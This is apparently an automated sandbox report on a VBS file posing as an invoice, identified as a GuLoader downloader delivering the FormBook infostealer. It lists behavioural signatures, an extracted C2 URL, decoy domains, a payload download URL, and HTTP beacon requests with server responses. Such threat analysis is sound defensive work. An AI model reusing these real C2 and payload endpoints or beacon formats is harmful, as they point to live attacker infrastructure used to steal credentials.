Windows Analysis Report
WWVN_INVOICE_8363567453.vbs

Overview

General Information

Sample Name: WWVN_INVOICE_8363567453.vbs
Analysis ID: 623396
MD5: 9f8e253fd51c33a2f874942ebc0d3795
SHA1: 6868a9005489e56542cf0df063985132fef50f3d
SHA256: c33e4e9bf305cec123840dd87aa84c6d71e68ac82ea039418e1b8be3ed791b37

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.shantelleketodietofficial.site/wn19/"], "decoy": ["intelios.xyz", "fungismartgrid.com", "wrsngh.com", "golatrak.com", "revboxx.com", "projectduckling.com", "yiwuanyi.com", "bellaigo.com", "rnrr.xyz", "dentalimplantsservicelk.com", "helixsaleep.com", "hokasneakeruse.xyz", "threads34.store", "ayanaslifeinmalaysia.com", "thebeautystore.store", "99221.net", "mc3.xyz", "coconsj.store", "abstractmouse.com", "bctp.xyz", "sura.ooo", "paradisetrippielagoon.com", "usnahrpc.com", "kbcoastalproperties.com", "whiskeyjr.com", "liesdevocalist.store", "schnellekreditfinanz.com", "katraderphotography.com", "guizhouwentuo.com", "tfp3gfekbrb9cx99.xyz", "reionsbank.com", "edwardfran.com", "grigorous.com", "linqxw.com", "proplanvetsdirect.com", "zildaalckmin.net", "herbalsfixng.xyz", "gpusforfun.com", "terra-stations.money", "anytoearn.com", "borneadomicile.com", "dtmkwd.sbs", "taakyif.com", "perrobravostudio.com", "limba6lamb.xyz", "gluideline.com", "travelchanel3d.com", "group-gr.com", "qcrcmh.com", "dujh.xyz", "screensunshincoust.com", "cnrhome.com", "getsuzamtir.xyz", "baseballportalusa.com", "laiwu-yulu.com", "repaircilinic.com", "nelvashop.com", "2228.wtf", "clickleaser.com", "jpfzaojyn.sbs", "tandelawnmaintenance.com", "actu-infomail.com", "m-a-a.xyz", "friendlyneighborholdings.com"]}
Source: 0000000D.00000002.1828222321.0000000009C70000.00000040.00000800.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}
Source: WWVN_INVOICE_8363567453.vbs ReversingLabs: Detection: 24%
Source: Yara match File source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Source: Binary string: chkdsk.pdbGCTL source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ieinstal.pdbGCTL source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ieinstal.pdb source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: $2l8C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: chkdsk.pdb source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1816473649.0000000008901000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop esi 32_2_0071730D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop ebx 32_2_00707B1C

Networking

Source: C:\Windows\explorer.exe Network Connect: 68.65.122.211 80
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.18 80
Source: C:\Windows\explorer.exe Network Connect: 209.99.40.222 80
Source: C:\Windows\explorer.exe Network Connect: 199.192.29.215 80
Source: C:\Windows\explorer.exe Network Connect: 180.76.247.231 80
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.171 80
Source: C:\Windows\explorer.exe Network Connect: 198.23.49.173 80
Source: Traffic Snort IDS: 2842115 ETPRO TROJAN MalDoc Requesting Payload 2020-04-21 192.168.11.20:49759 -> 203.170.86.89:80
Source: Initial file: Than21.SaveToFile FileName, adSaveCreateOverWrite
Source: DNS query: www.dujh.xyz
Source: DNS query: www.dujh.xyz
Source: DNS query: www.getsuzamtir.xyz
Source: Malware configuration extractor URLs: www.shantelleketodietofficial.site/wn19/
Source: Malware configuration extractor URLs: http://barsam.com.au/bin_FCWtLoO90.bin
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp HTTP/1.1Host: www.borneadomicile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp HTTP/1.1Host: www.clickleaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp HTTP/1.1Host: www.schnellekreditfinanz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp HTTP/1.1Host: www.repaircilinic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX+bZp2z2B9kFJxelKlpXP3rI73HFbKkzWSC2hacigUxO+LM&Vb3pDf=BHT0MRp HTTP/1.1Host: www.linqxw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 217.160.0.18 217.160.0.18
Source: Joe Sandbox View IP Address: 209.99.40.222 209.99.40.222
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Tue, 10 May 2022 12:25:21 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 
65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 10 May 2022 12:25:23 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 May 2022 12:26:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.clickleaser.com/wp-json/>; rel="https://api.w.org/"Vary: User-AgentConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 27 20 2f 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 43 6c 69 63 6b 20 4c 65 61 73 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 
3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 72 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 72 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 May 2022 12:26:47 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 65 74 73 75 7a 61 6d 74 69 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.getsuzamtir.xyz Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 10 May 2022 12:27:25 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: ieinstal.exe, 0000001B.00000002.1969523005.0000000003384000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bin
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bin4
Source: ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binC:
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binf
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bink
Source: ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binzs
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
